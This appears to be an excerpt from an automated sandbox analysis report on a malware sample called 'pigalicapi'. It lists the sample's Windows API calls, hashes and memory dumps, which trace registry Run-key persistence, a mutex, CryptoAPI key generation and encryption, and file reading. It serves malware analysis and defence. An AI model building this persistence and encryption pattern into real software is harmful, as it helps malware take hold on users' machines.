                                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 00A15F19
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Value$CloseDeleteOpenQuery
                                                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                                                          • API String ID: 647993726-227171996
                                                                                                                                                                                                                                                          • Opcode ID: bf300bb9ed70e2753454d52c7a3f78b24c074e472eb14a94230c1bf118438f6d
                                                                                                                                                                                                                                                          • Instruction ID: ec1c309860a551e9d5917788d32c147603d766637b7e5f04f9caf77cfef7c427
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf300bb9ed70e2753454d52c7a3f78b24c074e472eb14a94230c1bf118438f6d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17314DB4E00249EFDB10CFE4D855BFFBBB9AB48744F14805CEA05AB281D7B55A41CBA1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,005684BC,00000000,?,?,?,0056964F,?,?,00000100), ref: 00569458
                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00569490
                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,0056964F,?,?,00000100,?,?,?), ref: 005694DE
                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00569575
                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000100,?,00000000,00000000,?,?,?,0056964F,?,?,00000100,?), ref: 005695D8
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 005695E5
                                                                                                                                                                                                                                                            • Part of subcall function 00569273: RtlAllocateHeap.NTDLL(00000000,?,?,?,0056815B,00000220), ref: 005692A5
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 005695EE
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00569613
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3864826663-0
                                                                                                                                                                                                                                                          • Opcode ID: 3c69de157b906de3d2434209bdc24be4aece84faa61406a664b78215648cd76b
                                                                                                                                                                                                                                                          • Instruction ID: 3b3f0707dbea0ef15f220bfeca0f4f47de3cd1f72730c2675a5297d54f99054d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c69de157b906de3d2434209bdc24be4aece84faa61406a664b78215648cd76b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D051CC72A00216ABEF269E64CC85EBA7FADFF94750F144629F806D7180EB35DC41C6A0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00A14AD8
                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064), ref: 00A14AF4
                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(-0000000C), ref: 00A14B08
                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(-0000000C), ref: 00A14B44
                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A14B6B
                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 00A14B78
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 00A14B85
                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 00A14B90
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterEventFreeInitializeLeaveObjectSingleSleepUninitializeVirtualWait
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3462651527-0
                                                                                                                                                                                                                                                          • Opcode ID: 0949dd2142af6984715123acc84bfeb11bb972647d83a80619e017c62518f194
                                                                                                                                                                                                                                                          • Instruction ID: 93af33054794c1544aa731acada4cdeb6ceb16f06bf64f72c02540a712587b54
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0949dd2142af6984715123acc84bfeb11bb972647d83a80619e017c62518f194
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E213AB4A44208EFD704DBE8D958FEEB7B9EF48311F208588E505A7281D775EE81CB90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00A177C2
                                                                                                                                                                                                                                                          • GetExitCodeProcess.KERNEL32(00001388,00000000), ref: 00A1780E
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 00A17826
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00001388), ref: 00A17835
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00007530), ref: 00A17840
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000096,00000000,00008000), ref: 00A178A5
                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 00A178BD
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Sleep$CloseCodeExitFreeHandleInitializeProcessUninitializeVirtual
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2326833528-0
                                                                                                                                                                                                                                                          • Opcode ID: 7e8dbe337f2707646b14d39b2d7e4819bf7cb0301196cc5bfc062ba0011768ef
                                                                                                                                                                                                                                                          • Instruction ID: 7273c1182c57861dc26f59ec20d4881f42379d652cd65796ff317fe775b26831
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e8dbe337f2707646b14d39b2d7e4819bf7cb0301196cc5bfc062ba0011768ef
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07316974A44209EFDB00DFE4D988BEEB7B2FB48315F248598E405AB280D7759EC1DB91
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00A15CEB
                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00A15D10
                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 00A15D29
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00A15D45
                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 00A15D6D
                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A15D99
                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(000000FF), ref: 00A15DA3
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: File$Virtual$AllocChangeCloseCreateFindFreeNotificationReadSizelstrlen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 443218420-0
                                                                                                                                                                                                                                                          • Opcode ID: b2d2f2a9690d87b32a17cb23a67c3d72274178f887b7a7b41017883e9a05bcab
                                                                                                                                                                                                                                                          • Instruction ID: 89b5ed24b110e8fa2c356096b8813a7428057c205eb0f14ec5edb17c158c6507
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b2d2f2a9690d87b32a17cb23a67c3d72274178f887b7a7b41017883e9a05bcab
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A21EA79E40208FFDB14DBE4DC49BEEBB75AB48711F108548F615AB2C0D7749A81CBA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,00000000), ref: 00A11337
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00A11345
                                                                                                                                                                                                                                                          • RegSetValueExA.KERNELBASE(00000000,-00000208,00000000,00000001,?,?), ref: 00A11368
                                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 00A11372
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 00A1137D
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseOpenSleepValuelstrlen
                                                                                                                                                                                                                                                          • String ID: software\microsoft\windows\currentversion\run
                                                                                                                                                                                                                                                          • API String ID: 3411147897-1396020897
                                                                                                                                                                                                                                                          • Opcode ID: b6843699ddc24a0e70330d8a562b0113118482988f4a5e7fbd637a46f5390a59
                                                                                                                                                                                                                                                          • Instruction ID: ab745861ada3a1863c371c5a60382f3a1dce315245decd70c237088ae34d844b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6843699ddc24a0e70330d8a562b0113118482988f4a5e7fbd637a46f5390a59
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25212E74A40209EFDB04DFE4D949BFEBBB4FB48701F108258E611AB280D7749E41DBA1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00A15B7F
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00A15B8C
                                                                                                                                                                                                                                                          • StrStrIA.SHLWAPI(00000000,00000000), ref: 00A15BB6
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00A15BF6
                                                                                                                                                                                                                                                          • StrStrIA.SHLWAPI(00000000,00000000), ref: 00A15C2A
                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(00000000,00000000,-00000001), ref: 00A15C59
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00A15C9E
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocVirtuallstrlen$lstrcpyn
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 808621155-0
                                                                                                                                                                                                                                                          • Opcode ID: 1eb5fd7c8c7be13d9b6b7e51723321e52e6b2010b0389172bec23d1203b9c73e
                                                                                                                                                                                                                                                          • Instruction ID: fff40add0d082cfb4c2597d7707b571b50ae8c981b0e6f200f234746b2120fcb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1eb5fd7c8c7be13d9b6b7e51723321e52e6b2010b0389172bec23d1203b9c73e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8351D774D04609EFCB04CFA8C994BEEBBB5FF88305F148159E905A7284D375AA81CFA1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00A23B88,00000000,000F003F,00000000), ref: 00A16D30
                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,00A23FA6,00000000,00000003,?,00000020), ref: 00A16D61
                                                                                                                                                                                                                                                          • RegDeleteValueA.ADVAPI32(00000000,00A23FA6), ref: 00A16D7E
                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00A16D88
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Value$CloseDeleteOpenQuery
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 647993726-3916222277
                                                                                                                                                                                                                                                          • Opcode ID: 483d982406706e10e657bad7c3d86ad1dd3ba6ad0950cce2fefe8d1c537091c9
                                                                                                                                                                                                                                                          • Instruction ID: 0f548872268318dae16f586e329b1273005cfc54b8327cae96bc77148c4c5ab2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 483d982406706e10e657bad7c3d86ad1dd3ba6ad0950cce2fefe8d1c537091c9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4112EB5E44208EFDB10DFE4D898BFEBBB8BB48304F14814CE611A7241D7B59646CBA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 00A183BF
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 00A183D6
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00A1846B
                                                                                                                                                                                                                                                            • Part of subcall function 00A18970: CryptAcquireContextA.ADVAPI32(00000000,00A1C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 00A189BF
                                                                                                                                                                                                                                                            • Part of subcall function 00A18970: GetLastError.KERNEL32 ref: 00A189C9
                                                                                                                                                                                                                                                            • Part of subcall function 00A18970: CryptAcquireContextA.ADVAPI32(00000000,00A1C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 00A189F8
                                                                                                                                                                                                                                                            • Part of subcall function 00A18970: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A18A1F
                                                                                                                                                                                                                                                            • Part of subcall function 00A18970: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00A18A41
                                                                                                                                                                                                                                                            • Part of subcall function 00A18970: CryptDestroyKey.ADVAPI32(00000000), ref: 00A18A4E
                                                                                                                                                                                                                                                            • Part of subcall function 00A18970: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00A18A5A
                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A1858C
                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A185A3
                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A185BA
                                                                                                                                                                                                                                                            • Part of subcall function 00A18800: CryptAcquireContextA.ADVAPI32(00000000,00A1C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,00A18420,00000000,00001000,00000000), ref: 00A1883B
                                                                                                                                                                                                                                                            • Part of subcall function 00A18800: GetLastError.KERNEL32 ref: 00A18845
                                                                                                                                                                                                                                                            • Part of subcall function 00A18800: CryptAcquireContextA.ADVAPI32(00000000,00A1C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 00A18874
                                                                                                                                                                                                                                                            • Part of subcall function 00A18800: CryptGenKey.ADVAPI32(00000000,00006801,?,00000000), ref: 00A188AF
                                                                                                                                                                                                                                                            • Part of subcall function 00A18800: CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 00A188CF
                                                                                                                                                                                                                                                            • Part of subcall function 00A18800: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?), ref: 00A1890C
                                                                                                                                                                                                                                                            • Part of subcall function 00A18800: CryptExportKey.ADVAPI32(00000000,?,00000001,00000000,00000000,00000000), ref: 00A1892A
                                                                                                                                                                                                                                                            • Part of subcall function 00A18800: CryptDestroyKey.ADVAPI32(?), ref: 00A18937
                                                                                                                                                                                                                                                            • Part of subcall function 00A187D0: QueryPerformanceCounter.KERNEL32(?), ref: 00A187E7
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Crypt$Virtual$Context$Acquire$AllocFree$DestroyErrorExportImportLast$CounterEncryptPerformanceQueryRelease
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 487564122-0
                                                                                                                                                                                                                                                          • Opcode ID: 6563123c3fa5b47902663043c97eafbd7d5c80bca45d5a96e61ac11c5344e8ab
                                                                                                                                                                                                                                                          • Instruction ID: 7b570c0b5bb79e6d2467eead4327a0e237f8c2e9abd81b05953bb9b2c83cc589
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6563123c3fa5b47902663043c97eafbd7d5c80bca45d5a96e61ac11c5344e8ab
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B713FB5D00208ABDB14DFA4DC45FEEB7B5FB48310F148119FA15A7281EB749A84CFA5
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExitThread
                                                                                                                                                                                                                                                          • String ID: xnZ$xnZ
                                                                                                                                                                                                                                                          • API String ID: 2158977761-130287408
                                                                                                                                                                                                                                                          • Opcode ID: 3ed896bb648e7219ec7cd0a63e3982f16bbd879b5341ae1241b5c8dd5cb3c1dc
                                                                                                                                                                                                                                                          • Instruction ID: c38bb3c04fb535da0b9f24e19effde6331189c50014e120af8f717654466f4bc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ed896bb648e7219ec7cd0a63e3982f16bbd879b5341ae1241b5c8dd5cb3c1dc
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3312331600A06CFD760CF38D488B96B7E5FB49324F44896AE49ED7261E730B949DB11
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • LCMapStringEx.KERNEL32 ref: 0056771D
                                                                                                                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?), ref: 0056773B
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: String
                                                                                                                                                                                                                                                          • String ID: LCMapStringEx
                                                                                                                                                                                                                                                          • API String ID: 2568140703-3893581201
                                                                                                                                                                                                                                                          • Opcode ID: 5d755a369162aff225b1ab97080ae010154e575b9b247d51f86e2a1af60b38d3
                                                                                                                                                                                                                                                          • Instruction ID: 8b1e2f633d0116afee9d0d3fb4262faae1bdf9e72c1a045b45b4cb3a65a31816
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d755a369162aff225b1ab97080ae010154e575b9b247d51f86e2a1af60b38d3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C301BC3260420DFBCF12AF909C0AEAE7F62FB4C764F544554BE1926161DA728921EB91
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,pigalicapi,?,00A13BEB), ref: 00A15E0C
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00A13BEB), ref: 00A15E12
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                          • String ID: pigalicapi
                                                                                                                                                                                                                                                          • API String ID: 1925916568-2184165135
                                                                                                                                                                                                                                                          • Opcode ID: e3901ca609d0108a926395683f43bee1a856d085c027b3b17a6d57d4bf5b30db
                                                                                                                                                                                                                                                          • Instruction ID: 4a42f5461128eff7344c633a1270015df8f671602edc81cfc050b6288c9523d6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3901ca609d0108a926395683f43bee1a856d085c027b3b17a6d57d4bf5b30db
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57C08C3A2C43247BE6041BA1FD4BB893A889715FA1F504020F20AD50E1C98160428B16
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000004,-->), ref: 00A18300
                                                                                                                                                                                                                                                            • Part of subcall function 00A18090: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00A180D8
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                          • String ID: -->$<!--
                                                                                                                                                                                                                                                          • API String ID: 4275171209-1166897919
                                                                                                                                                                                                                                                          • Opcode ID: bd5f5e8d58e0b6f425b412338eb6f90f9cb55a1006224008302b6c5d05638612
                                                                                                                                                                                                                                                          • Instruction ID: fbb2edefb924c246533e31f9ccbd5b5485a0ff802cd7981ead570a8fa2d95402
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd5f5e8d58e0b6f425b412338eb6f90f9cb55a1006224008302b6c5d05638612
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10313E70D00249EFDF04DFA8C548BEEBBB1EF48704F188959E425BB241DB789A84CB95
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,00000000), ref: 00A1A45C
                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A1A480
                                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 00A1A494
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
